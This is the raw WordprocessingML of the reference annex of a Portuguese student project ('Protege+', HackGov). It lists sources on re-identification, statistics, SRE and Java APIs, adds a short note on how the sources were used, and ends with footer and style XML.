    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.4 Privacidade, anonimização e reidentificação</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ROCHER, Luc; HENDRICKX, Julien M.; DE MONTJOYE, Yves-Alexandre.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Estimating the success of re-identifications in incomplete datasets using generative models</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Nature Communications, v. 10, artigo 3069, 2019. DOI 10.1038/s41467-019-10933-3. Disponível em: https://www.nature.com/articles/s41467-019-10933-3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SWEENEY, Latanya.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">k-Anonymity: A Model for Protecting Privacy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. International Journal on Uncertainty, Fuzziness and Knowledge-based Systems, v. 10, n. 5, p. 557-570, 2002. Disponível em: https://epic.org/wp-content/uploads/privacy/reidentification/Sweeney_Article.pdf</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="179"/>
    <w:bookmarkStart w:id="180" w:name="X3f8c3ead2b9b5bc5f1fdc9b1045d925706b9147"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.5 Estatística, análise de dados e engenharia de sistemas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CASSELMAN, Bill.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The Legend of Abraham Wald</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Feature Column. Providence: American Mathematical Society, 2016. Fonte do episódio que dá origem ao conceito de viés de sobrevivência. Disponível em: https://www.ams.org/publicoutreach/feature-column/fc-2016-06</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GOOGLE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Site Reliability Engineering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: how Google runs production systems. Capítulo 4: Service Level Objectives. Editores: Betsy Beyer, Chris Jones, Jennifer Petoff e Niall Richard Murphy. Sebastopol: O’Reilly, 2016. Disponível em: https://sre.google/sre-book/service-level-objectives/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GOOGLE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The Site Reliability Workbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: practical ways to implement SRE. Capítulo 2: Implementing SLOs. Sebastopol: O’Reilly, 2018. Disponível em: https://sre.google/workbook/implementing-slos/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LEE, Hyunwoo; NUNAN, David.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Immortal time bias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Catalogue of Bias. Oxford: Centre for Evidence-Based Medicine, University of Oxford, 2020. Disponível em: https://catalogofbias.org/biases/immortal-time-bias/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY (NIST).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Coefficient of Variation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dataplot Reference Manual. Gaithersburg: NIST, [s.d.]. Disponível em: https://itl.nist.gov/div898/software/dataplot/refman2/auxillar/coefvari.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST/SEMATECH.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e-Handbook of Statistical Methods</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Seção 7.1.6: What are outliers in the data? 2012a. Define as cercas de 1,5 vezes o intervalo interquartil. Disponível em: https://www.itl.nist.gov/div898/handbook/prc/section1/prc16.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NIST/SEMATECH.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e-Handbook of Statistical Methods</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Seção 1.3.5.11: Measures of Skewness and Kurtosis. 2012b. Define o segundo coeficiente de assimetria de Pearson. Disponível em: https://www.itl.nist.gov/div898/handbook/eda/section3/eda35b.htm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PENN STATE UNIVERSITY.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">STAT 415: Unbiased Estimation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Eberly College of Science, STAT ONLINE, [s.d.]a. Fundamenta o divisor n menos 1 na variância amostral. Disponível em: https://online.stat.psu.edu/stat415/lesson/1/1.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PENN STATE UNIVERSITY.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">STAT 200: Correlation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Eberly College of Science, STAT ONLINE, [s.d.]b. Fundamenta as ressalvas sobre causalidade e linearidade do coeficiente de Pearson. Disponível em: https://online.stat.psu.edu/stat200/lesson/3/3.4/3.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TUKEY, John W.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Exploratory Data Analysis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Reading: Addison-Wesley, 1977. Referência original da análise exploratória e da regra das cercas para outliers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WANG, Zhi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 5: CPU Scheduling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Material didático do curso COP 4610, Introduction to Operating Systems, baseado em Silberschatz,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System Concepts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tallahassee: Florida State University, 2016. Fonte sobre inanição e envelhecimento em escalonamento por prioridade. Disponível em: https://www.cs.fsu.edu/~zwang/files/cop4610/Spring2016/chapter5.pdf</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="180"/>
    <w:bookmarkStart w:id="181" w:name="e.6-documentação-de-tecnologia-utilizada"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.6 Documentação de tecnologia utilizada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ORACLE CORPORATION.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class PriorityQueue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Java SE 21 API Specification. Redwood Shores: Oracle, 2023a. Disponível em: https://docs.oracle.com/en/java/javase/21/docs/api/java.base/java/util/PriorityQueue.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ORACLE CORPORATION.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Java SE 21 API Specification. Redwood Shores: Oracle, 2023b. Disponível em: https://docs.oracle.com/en/java/javase/21/docs/api/java.base/java/util/Stack.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ORACLE CORPORATION.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Class ArrayDeque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Java SE 21 API Specification. Redwood Shores: Oracle, 2023c. Disponível em: https://docs.oracle.com/en/java/javase/21/docs/api/java.base/java/util/ArrayDeque.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Referencia"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ORACLE CORPORATION.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PERCENTILE_CONT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Oracle Database SQL Language Reference. Redwood Shores: Oracle, [s.d.]. Disponível em: https://docs.oracle.com/en/database/oracle/oracle-database/21/sqlrf/PERCENTILE_CONT.html</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="181"/>
    <w:bookmarkStart w:id="182" w:name="e.7-nota-sobre-o-uso-das-fontes"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E.7 Nota sobre o uso das fontes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duas ressalvas de honestidade intelectual fecham este anexo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nem toda afirmação deste documento precisa de fonte externa, e forçar uma seria pior do que não ter.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Os números da Parte 4 descrevem a base de demonstração do próprio projeto e são verificáveis por execução, não por citação: a fonte deles é o Anexo B. As fontes externas aparecem onde sustentam uma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">decisão</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e não onde apenas decorariam um dado interno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Onde a fonte primária não pôde ser lida diretamente, isso está dito.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O texto do controle 8.15 da ISO/IEC 27002:2022 é norma paga e foi citado pelo número e pelo nome do controle, sem transcrição. Os relatórios de ouvidoria da CGU e o balanço do Disque 100 foram atribuídos ao órgão produtor. Nenhum número deste documento foi tomado de repercussão jornalística sem que a origem institucional fosse identificada.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="182"/>
    <w:bookmarkEnd w:id="183"/>
    <w:sectPr>
      <w:footerReference r:id="rId9" w:type="default"/>
      <w:footerReference r:id="rId10" w:type="first"/>
      <w:pgSz w:h="16838" w:w="11906"/>
      <w:pgMar w:bottom="1418" w:footer="567" w:gutter="0" w:header="709" w:left="1418" w:right="1276" w:top="1418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  <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="6" w:color="C6CEDA"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:sz w:val="16"/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:t xml:space="preserve">Protege+ | HackGov Fase 5 | Gabriel Vasconcellos Gomes, RM 561601 | p. </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
        <w:color w:val="666666"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
</w:ftr>
</file>

<file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
<w:ftr xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:p>
    <w:pPr>
      <w:jc w:val="cen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264" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="pt-BR"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="BodyText" w:type="paragraph">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:pPr>
      <w:spacing w:after="150" w:before="0" w:line="264" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:qFormat/>
  </w:style>
  <w:style w:styleId="FirstParagraph" w:type="paragraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Compact" w:type="paragraph">
    <w:name w:val="Compact"/>
    <w:basedOn w:val="BodyText"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="19"/>
      <w:szCs w:val="19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color="FFC72C" w:space="4" w:sz="12" w:val="single"/>
      </w:pBdr>
      <w:spacing w:after="160" w:before="420"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F2F6B"/>
      <w:sz w:val="34"/>
      <w:szCs w:val="34"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading2" w:type="paragraph">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="100" w:before="320"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1D4ED8"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading3" w:type="paragraph">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="80" w:before="260"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F2F6B"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading4" w:type="paragraph">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="70" w:before="220"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:color w:val="333333"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:color="FFC72C" w:space="10" w:sz="18" w:val="single"/>
      </w:pBdr>
      <w:shd w:color="auto" w:fill="FBF8EF" w:val="clear"/>
      <w:spacing w:after="120" w:before="120"/>
      <w:ind w:left="284" w:right="142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C6CEDA" w:sz="4" w:val="single"/>
        <w:left w:color="C6CEDA" w:sz="4" w:val="single"/>
        <w:bottom w:color="C6CEDA" w:sz="4" w:val="single"/>
        <w:right w:color="C6CEDA" w:sz="4" w:val="single"/>
        <w:insideH w:color="D9DEE7" w:sz="4" w:val="single"/>
        <w:insideV w:color="D9DEE7" w:sz="4" w:val="single"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:top w:type="dxa" w:w="60"/>
        <w:left w:type="dxa" w:w="90"/>
        <w:bottom w:type="dxa" w:w="60"/>
        <w:right w:type="dxa" w:w="90"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:color w:val="0F2F6B"/>
      </w:rPr>
      <w:tcPr>
        <w:shd w:color="auto" w:fill="E8EEF8" w:val="clear"/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color w:val="0F2F6B"/>
      <w:sz w:val="18"/>
      <w:szCs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Lines/>
      <w:pBdr>
        <w:left w:color="1D4ED8" w:space="8" w:sz="12" w:val="single"/>
      </w:pBdr>
      <w:shd w:color="auto" w:fill="F4F6FA" w:val="clear"/>
      <w:spacing w:after="140" w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="170" w:right="60"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Centralizado" w:type="paragraph">
    <w:name w:val="Centralizado"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:jc w:val="center"/>
      <w:spacing w:after="0" w:before="0"/>
    </w:pPr>
  </w:style>
  <w:style w:customStyle="1" w:styleId="Referencia" w:type="paragraph">
    <w:name w:val="Referencia"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="454" w:left="454"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:r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2026-09-13T07:06:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-13T07:06:46Z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